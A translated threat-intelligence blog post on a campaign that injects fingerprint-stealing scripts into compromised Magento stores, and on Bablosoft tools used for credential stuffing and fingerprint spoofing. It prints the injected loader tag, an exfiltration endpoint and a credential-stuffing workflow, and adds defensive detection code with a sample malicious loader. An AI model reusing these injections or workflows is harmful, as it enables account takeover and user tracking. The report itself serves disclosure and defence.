This article was produced with Doubao's immersive translation and the Yuque plugin. For the original, see:
https://www.group-ib.com/blog/fingerprint-heists
Summary
This article describes how online fraudsters abuse browser fingerprinting for malicious activity, covering how fingerprints are collected, the impact on users and businesses, and the tools and techniques involved.
Key highlights
• Risk of browser fingerprinting: fraudsters use browser fingerprinting to steal users' unique digital identifiers and commit fraud. The technique is invisible to the victim, who may not know the fingerprint has been captured or misused; the result can be personal accounts being locked out and corporate security systems being rendered ineffective.
• Analysis of the malicious campaign: Group-IB threat intelligence and fraud protection specialists found that since May 2024 a threat actor has been compromising Magento websites and injecting malicious code to collect user fingerprints. The code is hidden behind an HTML comment tag to look legitimate; it collects browser settings, plugin lists and other data and sends them to the threat actor's private database.
• Bablosoft tooling: the automation tools developed by Bablosoft are often linked to cybercrime. Its core product, BrowserAutomationStudio (BAS), automates browser activity; combined with the FingerprintSwitcher module it imitates legitimate user behaviour to reduce the chance of detection. The BAS suite is widely used for malicious activity in underground communities.
• Credential stuffing attacks: attackers use Bablosoft and FingerprintSwitcher in credential stuffing campaigns, importing credential lists and mapping the login flow of target sites. Fingerprint spoofing bypasses detection, and stolen user fingerprints can cause legitimate users to be wrongly blocked.
• Attack flow: identifying targets, searching for credential lists, using Browser Automation Studio for resource development and account access, bypassing fraud protection systems, and performing fraud and monetisation. Methods for bypassing fraud protection include third-party CAPTCHA-solving and phone-verification modules and fingerprint spoofing via the PerfectCanvas technology.
Original article
Introduction
Fraudsters are continuously seeking innovative ways to exploit unsuspecting internet users. One of the latest and most concerning techniques revolves around browser fingerprinting — a method that allows cybercriminals to steal unique digital identifiers associated with user online activity.
What makes browser fingerprinting particularly alarming is its invisibility. The victim might not even know that the fingerprint has been captured or misused. Fraudsters can bypass security measures, impersonate victims on trusted platforms, and commit fraudulent activities—all without triggering suspicion from security systems that rely on these fingerprints for authentication.
The implications are far-reaching, affecting individuals and organisations alike. Companies that rely on browser fingerprinting to detect fraud or prevent account takeovers may find their systems rendered ineffective. For individuals, the theft of a fingerprint can result in unexpectedly being locked out of accounts on different online services due to false positives triggered by fraud protection or security systems.
In this blog, we’ll delve into how browser fingerprints are collected, the methods fraudsters use to steal and exploit them, and the steps you can take to protect yourself. Whether you’re an individual user or a business looking to enhance security, this guide will provide the insights to stay one step ahead of cybercriminals.
Key discoveries in the blog
• Advanced Fingerprinting Techniques: Cybercriminals exploit sophisticated methods to extract unique browser characteristics without user consent.
• Identified malicious campaign collecting fingerprints of unaware users: a threat actor is compromising Magento websites to inject malicious code aimed at collecting the fingerprints of visiting users.
• Risks for Individuals: Individuals face potential account lockouts and false positives from fraud protection systems, which can disrupt access to multiple online services.
• Comprehensive Insight and Protection Strategies: The blog provides an in-depth exploration of how browser fingerprints are collected and exploited, along with practical steps for both businesses and individuals.
Who may find this blog interesting:
• Cybersecurity analysts and corporate security teams
• Malware analysts
• Head of Fraud Protection
• Threat intelligence specialists
• Cyber investigators
• Computer Emergency Response Teams (CERT)
• Law enforcement investigators
• Cyber police forces
Fingerprinting Collection Using Compromised Magento Websites
Campaign Analysis
In October 2024, Group-IB threat intelligence and fraud protection specialists identified a malicious campaign that had been ongoing since at least May 2024. In this campaign, a threat actor, now tracked as ScreamedJungle, injected a Bablosoft JS script into compromised Magento websites to collect fingerprints of visiting users. Analyses carried out by Group-IB analysts identified the compromise of more than 115 e-commerce websites.
Although the technique used by the threat actor to compromise Magento online stores is not known with certainty, an analysis of the compromised sites suggests that the threat actor is likely exploiting known vulnerabilities affecting vulnerable Magento versions (e.g., CVE-2024-34102 – CosmicSting, CVE-2024-20720). This assumption is supported by the fact that many of the compromised websites detected use Magento 2.3, which reached end-of-life (EOL) status and has not been supported since September 2022.
Below is an example of an injected script on compromised websites:
Figure 1. Example of injected Bablosoft fingerprinting script on compromised Magento website.
<script type="text/javascript" charset="UTF-8" src="hxxps://busz[.]io/j9z3GfPd?pr=1&sub_id_2={victim_domain}">
As can be observed from the image above, in most cases the injected script is hidden behind an HTML comment tag labeled <!-- Google Finger Analytics --> to give it a legitimate appearance. More generally, the behavior of the JS script can be summarized as follows:
• The JS script is imported from a malicious domain under the threat actor's control; in the case above it is hosted at hxxps://busz[.]io/j9z3GfPd?pr=1&sub_id_2={victim_domain}, which redirects to hxxps://busz[.]io/clientsafe.js;
• If the user visiting the compromised site is using a desktop device, i.e. not presenting a mobile user agent, the ProcessFingerprint function is executed;
• Once the function is executed, several parameters related to the user visiting the compromised web pages are processed and collected (e.g., browser settings, plugin list, font list, system properties and others);
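As an added example (not code from the Group-IB post or from Bablosoft), the following Node.js script checks a page's HTML for the injection pattern described above: an external script tag placed under a vendor-looking comment label and carrying the site's own domain in its query string. The site origin, the allowlist, the sample HTML and the collector hostname are constructed assumptions.

```javascript
// Added example (not from the Group-IB post): scan a page's HTML for script
// tags matching the injection pattern described above. Node.js, no dependencies.

const SCRIPT_RE = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)["']?[^>]*>/gi;
const COMMENT_RE = /<!--([\s\S]*?)-->/g;
const VENDOR_LABEL_RE = /google|analytics|tag manager/i;
const SITE_ORIGIN = 'https://shop.example/'; // assumed site being checked
const SITE_HOST = new URL(SITE_ORIGIN).hostname;

// Hosts the site legitimately loads scripts from (assumed allowlist).
const DEFAULT_ALLOWED = new Set([SITE_HOST, 'static.shop.example', 'www.googletagmanager.com']);

function hostOf(src) {
  try { return new URL(src, SITE_ORIGIN).hostname; } catch { return null; }
}

// Returns one finding per script tag that breaks at least one rule.
function findSuspiciousScripts(html, allowedHosts = DEFAULT_ALLOWED) {
  // Collect every HTML comment with its end position so a script tag can be
  // matched to the comment label placed just above it.
  const comments = [];
  for (const m of html.matchAll(COMMENT_RE)) {
    comments.push({ end: m.index + m[0].length, text: m[1].trim() });
  }
  const labelBefore = (pos) => {
    let best = null;
    for (const c of comments) {
      if (c.end <= pos && pos - c.end < 200 && (!best || c.end > best.end)) best = c;
    }
    return best ? best.text : null;
  };

  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const src = m[1];
    const host = hostOf(src);
    const label = labelBefore(m.index);
    const reasons = [];
    if (host && !allowedHosts.has(host)) {
      reasons.push('host not in allowlist');
      // A label such as "Google Finger Analytics" above a script served from
      // an unrelated host is the disguise used in the campaign.
      if (label && VENDOR_LABEL_RE.test(label)) reasons.push('vendor-looking comment label');
      // The injected loader carried the victim site's domain in its query string.
      const query = src.includes('?') ? src.slice(src.indexOf('?') + 1) : '';
      if (query.includes(SITE_HOST)) reasons.push('own domain passed to third-party script');
    }
    if (reasons.length) findings.push({ src, host, label, reasons });
  }
  return findings;
}

// Constructed sample page: one first-party script, one legitimate tag manager
// load, and one injected loader disguised with an analytics-style comment.
const SAMPLE_HTML = `<!doctype html><html><head>
<script src="/js/app.js"></script>
<!-- Google Tag Manager -->
<script src="https://www.googletagmanager.com/gtag/js?id=G-PLACEHOLDER"></script>
<!-- Google Finger Analytics -->
<script type="text/javascript" charset="UTF-8"
  src="https://collector.invalid/loader.js?pr=1&sub_id_2=shop.example"></script>
<!-- End Google Finger Analytics -->
</head><body></body></html>`;

console.log(JSON.stringify(findSuspiciousScripts(SAMPLE_HTML), null, 2));
```

Run it against the rendered HTML of each storefront page (for example from a periodic crawl) and tune the allowlist to the site's real third-party scripts.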
clientsafe.js
A deeper analysis of the injected clientsafe.js script revealed that it is part of the Bablosoft BrowserAutomationStudio (BAS) suite; its purpose is to collect users’ fingerprints for later use in the Bablosoft FingerprintSwitcher module.
Figure 2. FingerprintSwitcher webpage.
More specifically, the threat actor is abusing a BabloSoft solution called “CustomServers” which allows them to independently collect fingerprints and store them in a private Bablosoft database.
For fingerprints to be saved to the private database, the threat actor must provide the ProcessFingerprint function with a public key assigned by BabloSoft when subscribing to the CustomServers service; the public keys identified in the campaign under analysis are as follows:
5rdc71h00d6udaqhuzgxhga02ewj095nvrk6nxah6vhrb70wqmu854mevhe27mgv
Xc3blub4pxwvxhj0oc4ddtqgkkpm42my84uqo7hyv6zwfetg7hiwnnl9wlzwnso7
Figure 3. An excerpt of CustomServers documentation.
The clientsafe.js script connects to Bablosoft’s server, retrieves encoded instructions like the PerfectCanvas request, and uses the eval function to run decoded instructions in the browser of visitors of the compromised website. More details about PerfectCanvas and CustomServers are described later in the blog.
Figure 4. How PerfectCanvas is generated on the CustomServer side.
In addition, the clientsafe.js script contains several other functions to collect information about the system and browser of users visiting the compromised website, such as:
• GetSystemFontData
• GetWebGPUData
• getInstalledExtensions
• GetBatteryInfo
• GetWindowProperties
• GetDoNotTrack
• GetHLSSupport
• GetCodecsData
• GetUserAgentData
• GetMediaDevices
• GetVoices
• GetBluetoothData
• GetKeyboardLayout
• GetStorageSize
• GetFonts
As an example, the following is the function that leverages the Keyboard API to verify the layout used by a visiting user:
Figure 5. Function that collects information about keyboard layout.
All collected data are then sent to the Bablosoft hxxps://customfingerprints[.]bablosoft[.]com/save endpoint and saved in the threat actor's private database via the ServerPoster function.
Figure 6. Function that sends collected data.
Figure 7. ServerPoster function.
The following is an example of a POST request to the endpoint, transmitting a JSON payload that includes the obtained fingerprint.
Figure 8. An excerpt of collected fingerprint transmitted via POST request.
Refs:
• https://urlscan.io/responses/dcc1122bcf60d91acae0703de18ed4ac027f6d3d55eebd1e87c4f4647b2daeca/
Impact – Case study: Italy
To better understand the impact of the campaign under analysis, we examined nine Italian websites that were compromised in this campaign, some of which appear to still be infected at the time of writing, in order to estimate the amount of users for whom fingerprints may have been collected.
To this end, we utilized publicly available web data to estimate the traffic of the compromised sites, as well as the number of potential daily visitors.
Table (estimated traffic of the nine compromised Italian websites; row values not preserved): Industry | Average number of monthly visitors | Average number of monthly unique visitors | Average number of daily unique visitors
Although, as stated earlier, these are estimated volumes of the traffic received by the websites and could therefore deviate from the actual values, it is possible to observe that, for the Italian market alone, this campaign is potentially able to collect over 200,000 fingerprints of Italian users monthly.
What is Bablosoft?
Bablosoft develops automation tools often linked to cybercriminal activities such as credential stuffing, fraud schemes, and data harvesting.
Figure 9. Bablosoft webpage.
The core product developed by Bablosoft is BrowserAutomationStudio (BAS), a tool for automating browser-based activities that does not require coding skills. It allows users to create scripts that simulate human actions on websites, such as clicking and filling out forms. Threat actors utilize the BAS suite to automate activities against websites, such as credential stuffing attacks, user registrations, and data scraping. Combined with the FingerprintSwitcher module, this setup mimics legitimate user behavior, significantly reducing the likelihood of detection.
Bablosoft on Underground Communities
The first known mention of BAS dates back to April 2016, when a user under the pseudonym “Atabas” sponsored the tool on the PirateHub forum.
Regarding the FingerprintSwitcher module, the first known mention on the web of such a service dates back to February 2017, when user “Twaego”, who is presumed to be one of the developers of the BAS suite, sponsored the creation of the related service on the BlackHatWorld forum.
Figure 11. Introduction of the BAS module to change fingerprints.
As mentioned above, the BAS suite, and all related modules, are widely used to carry out malicious activities and are a topic of interest in underground communities. In particular, its use is often seen as an alternative to other web automation tools (e.g., openbullet), for the development of bruteforcers, checkers, autoregisters, scrapers, and more. The following are examples of a post from developers offering their services for the development of targeted BAS projects, and from a user looking for someone who can implement a bruteforcer to target a U.S. bank.
Figure 13. Forum user looking for a BAS developer to develop a brute-forcer targeting an American bank. English translation: ”Looking for a brut on [REDACTED] Bank, made on BAS or analogs, stable working from 3 months, the deal is strictly through the guarantor, payment only after full verification. Price from 200$.”
Credential Stuffing with Bablosoft and FingerprintSwitcher
The technologies discussed above can be exploited by attackers in credential-stuffing campaigns. Credential stuffing is a type of activity where attackers exploit stolen account credentials to attempt unauthorized access to user accounts.
To automate the process and avoid detection, fraudsters can use different tools. By leveraging these capabilities attackers can test thousands of stolen username-password pairs against multiple websites without triggering traditional security mechanisms. Fingerprint spoofing ensures their requests appear as legitimate user activity, bypassing detection.
Additionally, stolen user fingerprints can have severe consequences for legitimate users. Fraudsters who reuse stolen device fingerprints can make it appear as though legitimate users’ devices are engaging in fraudulent behavior. As a result, fraud protection systems may wrongfully block legitimate users, flagging their devices as high risk due to association with prior attacks.
Note: Since credential-stuffing attacks have different variations, this specific example describes a case in which an attacker uses stolen or compromised credentials to target a specific website. The main goal is the verification of accounts for further exploitation.
Figure 14. Example of BAS scripts offered in Darknet.
Using BAS, fraudsters can import a list of credentials, map out the login flow of a target website, and configure BAS to input the credentials repeatedly while monitoring for successful authentications, enhancing the effectiveness of the attacks.
Figure 15. Fraud Matrix of the Account Stuffing Attack.
Figure 15 shows tactics and techniques of the Fraud Matrix framework executed during the attack. Below we will go through the major stages in detail.
Reconnaissance
Fraudsters start by identifying targets for the attack based on factors such as the availability of reused or exposed credentials, the presence of weak security measures, the potential value of compromised accounts, and the ability to efficiently automate attacks using preconfigured tools (e.g., Bablosoft) tailored for specific targets, such as banks or online portals. Then they investigate the structure of the targeted website more deeply, i.e. the IDs of the HTML elements they have to interact with to emulate a real user.
As the next step, fraudsters search for a list of credentials, usually referred to as a combolist, that will be used in credential stuffing attacks against targeted websites. These combo lists can be obtained from various sources like underground forums and cybercrime communities in Telegram, and are then fed into the BAS database as shown in Figure 16 below.
Figure 16. Database Manage in BrowserAutomation Studio.
Resource development, Account Access
Browser Automation Studio offers a wide range of modules that can facilitate fraudsters’ activity: filesystem and network operations, IP info services, phone verification services and others, as well as automation of the embedded browser, which is based on the Chromium Embedded Framework (CEF). A non-exhaustive list is shown in Figure 17 below.
*CEF is an open-source framework for embedding the Chromium browser stack into other applications; it is used by well-known software vendors.
Figure 17. Browser Automation Studio Modules.
Browser Automation Studio could be considered an IDE for visual programming. It has many control blocks that represent common statements and logical statements, as shown in Figure 18.
Figure 18. Script Logic blocks in Browser Automation Studio.
These control blocks allow for the quick creation of custom scripts that can operate with BAS modules. An example of such a script is shown in Figure 19.
• The script requests a stolen fingerprint and applies it to the internal browser (step 1);
• reads credentials from the database (step 2);
• opens the website via the internal browser and inputs the credentials into the form on the website (step 3);
• idles for a while, presses the “Login” button (step 4), then waits until the page is loaded;
• updates the corresponding records in the database if a specific HTML element exists (step 5).
Figure 19. Script Editor in Browser Automation Studio.
Defence evasion (Fraud Protection systems Bypass)
Browser Automation Studio offers a wide range of capabilities to bypass fraud protection systems. Some of them are implemented as a part of the Bablosoft ecosystem and others are integrations with third-party services.
For example, CAPTCHA solving modules are implemented by third parties, some of which are generic and some targeting specific well-known CAPTCHA vendors.
Figure 20. Captcha Solving Modules in Browser Automation Studio.
The other example of third-party integration is the phone verification module that allows the use of temporary phone numbers.
Figure 21. The example of phone number verification.
The most interesting part of the defence evasion capabilities is fingerprint spoofing. It leverages the PerfectCanvas technology.
PerfectCanvas
PerfectCanvas is a technology that allows BAS to receive fingerprints from real devices to bypass canvas fingerprinting methods of fraud protection systems. The high-level process looks as follows:
1. The canvas is first rendered on a separate, remote machine.
2. The rendered canvas data is then sent to the local machine.
3. The canvas data in the BAS browser is replaced with the remotely rendered data.
The key difference of this method is that the canvas data transmitted is byte-for-byte identical to that generated on the real device, rather than being obtained by adding noise to the original canvas.
To use PerfectCanvas, the fraudster must visit the targeted site using a specialized browser called CanvasInspector, which is designed to generate the “PerfectCanvas request.”
Figure 22. CanvasInspector.
The “PerfectCanvas request” is a string that contains all the necessary information to render the canvas on a remote machine.
Figure 23. “PerfectCanvas request” for browserleaks[.]com.
Once the fraudster has the “PerfectCanvas request,” they can obtain fingerprints with the PerfectCanvas replacement by sending a request to the server and receiving a response.
Figure 24. The PerfectCanvas workflow.
Bablosoft offers fraudsters the CustomServers feature to pre-collect fingerprints and instantly use them in fraudulent transactions. A CustomServer is a web server that hosts the clientSafe.js script. As mentioned above, this script generates fingerprints on demand. By injecting it into popular websites, fraudsters receive hundreds of thousands of fingerprints from the devices of unaware users per month.
Figure 25. The stolen fingerprints abuse via CustomServers.
Perform fraud and Monetization
Once fraudsters prepare their scripts they can run them on previously gathered credentials databases for in-bulk exfiltration of some useful account data e.g., payment details, and personal data. This opens an opportunity for selling more quality and enriched databases.
Another feature of BrowserAutomationStudio (BAS) is its ability to compile scripts into standalone executable files. This means that once an attacker creates a credential-stuffing script using BAS, they can package it into an executable program that runs independently of the BAS environment. These compiled scripts can be easily distributed, offered, or shared with other fraudsters.
Figure 26. Compile Script window of Browser Automation Studio.
Conclusion
Browser fingerprinting is a powerful technique commonly used by websites to track user activities and tailor marketing strategies. However, this information is also exploited by cybercriminals to mimic legitimate user behavior, evade security measures, and conduct fraudulent activities. The identification of a malicious campaign specifically designed to compromise e-commerce websites and collect the fingerprints of unaware users underscores the high value of this information within the cybercriminal community and highlights the need for continued research and analysis of the tools and techniques used for illicit purposes, enabling security teams to improve detection capabilities and strengthen defenses against fraudulent activities.
To this end, we report below some recommendations for the different entities involved in the identified campaign.
For website owners:
• Regularly conduct a website analysis to evaluate its integrity and eliminate any potential persistence mechanisms or malicious files;
• Keep systems up-to-date and always install relevant security patches;
• Use complex passwords and adopt two-factor authentication;
• Monitor accesses of privileged accounts;
• Perform security audits (e.g., vulnerability assessments, penetration tests) periodically in order to identify the presence of any vulnerabilities that could lead to website compromise;
Advice for end users to limit exposure of their fingerprint:
• Use privacy-oriented browsers that implement additional protection measures to block suspicious fingerprint scripts;
• Use trusted and reliable browser extensions aimed at blocking the execution of suspicious javascript and detection of tracking techniques;
Recommendations for cybersecurity and fraud teams for prevention and detection of attacks with Browser Automation Studio and
• Identify changes in known user environment, i.e. change of operating system and metadata;
• Subscribe for intelligence services (i.e. threat intelligence, fraud intelligence) to be updated with evolving fraud schemes and technologies;
• Use Multi-Factor Authentication (MFA) for authentication processes or sensitive user activity, i.e. for password changing.
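As an added example (not code from the Group-IB post or from any vendor), the following Node.js snippet shows the kind of server-side consistency check the first recommendation above calls for: it compares the fingerprint presented at login with the account's last known environment and counts how many distinct accounts recently presented the same canvas hash, which is what a byte-identical replayed canvas driving a credential-stuffing run looks like from the defender's side. Field names, thresholds and the login log are constructed assumptions.

```javascript
// Added example (not from the Group-IB post): server-side checks a fraud team
// could apply to the fingerprint presented at login. Field names and the
// thresholds are assumptions, not any vendor's scheme.

const WINDOW_MS = 24 * 60 * 60 * 1000; // look-back for fingerprint sharing
const SHARED_ACCOUNTS_LIMIT = 3;       // distinct accounts on one canvas hash

// Environment fields a genuine returning device keeps stable between logins.
const ENV_FIELDS = ['platform', 'timezone', 'keyboardLayout'];

// Count distinct accounts that presented the same canvas hash recently.
// sightings: [{canvasHash, account, ts}] taken from the login log.
function accountsSharingCanvas(sightings, canvasHash, now) {
  const accounts = new Set();
  for (const s of sightings) {
    if (s.canvasHash === canvasHash && now - s.ts <= WINDOW_MS) accounts.add(s.account);
  }
  return accounts.size;
}

// known: the profile last seen on this account (null for a first login).
// observed: the fingerprint presented now.
function assessLogin(known, observed, sightings, now) {
  const signals = [];
  if (known) {
    const changed = ENV_FIELDS.filter((f) => observed[f] !== known[f]);
    if (changed.length) signals.push(`environment changed: ${changed.join(', ')}`);
    if (observed.canvasHash !== known.canvasHash) signals.push('canvas differs from last known device');
  }
  const sharers = accountsSharingCanvas(sightings, observed.canvasHash, now);
  if (sharers >= SHARED_ACCOUNTS_LIMIT) {
    // One replayed fingerprint driving logins to many accounts is the
    // credential-stuffing pattern described above.
    signals.push(`canvas hash shared by ${sharers} accounts within 24h`);
  }
  let risk = 'low';
  if (sharers >= SHARED_ACCOUNTS_LIMIT) risk = 'high';
  else if (signals.length) risk = 'medium';
  return { risk, signals };
}

// Constructed data: three accounts already logged in with canvas hash "c-stolen"
// in the last few hours; "dave" last logged in from his own Mac.
const NOW = 1700000000000;
const SIGHTINGS = [
  { canvasHash: 'c-stolen', account: 'alice', ts: NOW - 3600000 },
  { canvasHash: 'c-stolen', account: 'bob', ts: NOW - 7200000 },
  { canvasHash: 'c-stolen', account: 'carol', ts: NOW - 10800000 },
  { canvasHash: 'c-stale', account: 'dave', ts: NOW - 3 * WINDOW_MS },
];
const KNOWN_DAVE = { canvasHash: 'c-dave', platform: 'MacIntel', timezone: 'Europe/Rome', keyboardLayout: 'it' };
const OBSERVED_REPLAY = { canvasHash: 'c-stolen', platform: 'Win32', timezone: 'Europe/Rome', keyboardLayout: 'it' };
const OBSERVED_GENUINE = { canvasHash: 'c-dave', platform: 'MacIntel', timezone: 'Europe/Rome', keyboardLayout: 'it' };

function demo() {
  return {
    replay: assessLogin(KNOWN_DAVE, OBSERVED_REPLAY, SIGHTINGS, NOW),
    genuine: assessLogin(KNOWN_DAVE, OBSERVED_GENUINE, SIGHTINGS, NOW),
  };
}
console.log(JSON.stringify(demo(), null, 2));
```

A "high" result is a prompt for step-up authentication (the MFA recommendation above) rather than an outright block, since a stolen fingerprint may also belong to an innocent user of a compromised store.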
Examples of Fraud Matrix mitigations and detections sorted by efficiency:
High Efficiency
Mitigations: table with columns Fraud Matrix ID | Description (row values not preserved)
Detections: table with columns Fraud Matrix ID | Data Component (row values not preserved)
Moderate Efficiency
Mitigations: table with columns Fraud Matrix ID | Description (row values not preserved)
Detections: table with columns Fraud Matrix ID | Data Component (row values not preserved)
Note: DS2001 is useful for early detection but relies on external sources and doesn’t directly prevent attacks in real time.
MITRE ATT&CK
Figure 27. ScreamedJungle ATT&CK
Indicators of Compromise (IOCs)
Network Indicators:
Source: Fingerprint Heists | Group-IB Blog
Originally published on the WeChat official account RedTeaming: Malicious theft and abuse of browser fingerprints